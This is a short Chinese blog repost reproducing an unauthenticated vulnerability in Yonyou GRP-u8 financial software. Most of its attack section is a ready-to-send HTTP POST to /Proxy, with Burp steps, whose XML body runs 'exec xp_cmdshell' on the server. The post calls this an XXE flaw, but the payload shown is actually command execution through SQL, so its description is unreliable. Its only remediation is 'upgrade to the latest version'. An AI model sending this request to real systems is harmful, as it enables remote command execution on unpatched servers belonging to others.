当前位置:   article > 正文

用友GRP-u8 XXE 漏洞复现_用友uap xxe漏洞

用友uap xxe漏洞

0x00 漏洞描述

 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。

0x01 漏洞利用条件

无需登录

0x02 漏洞复现

POC:

  1. POST /Proxy HTTP/1.1
  2. Content-Type: application/x-www-form-urlencoded
  3. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
  4. Host: localhost
  5. Content-Length: 341
  6. Connection: Keep-Alive
  7. Cache-Control: no-cache
  8. cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

burp抓包,修改url为/Proxy,在body中添加payload

0x03 修复建议

升级最新版本

转载请注明:Adminxe's Blog » 用友GRP-u8 XXE 漏洞复现

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/神奇cpp/article/detail/827757
推荐阅读
相关标签
  

闽ICP备14008679号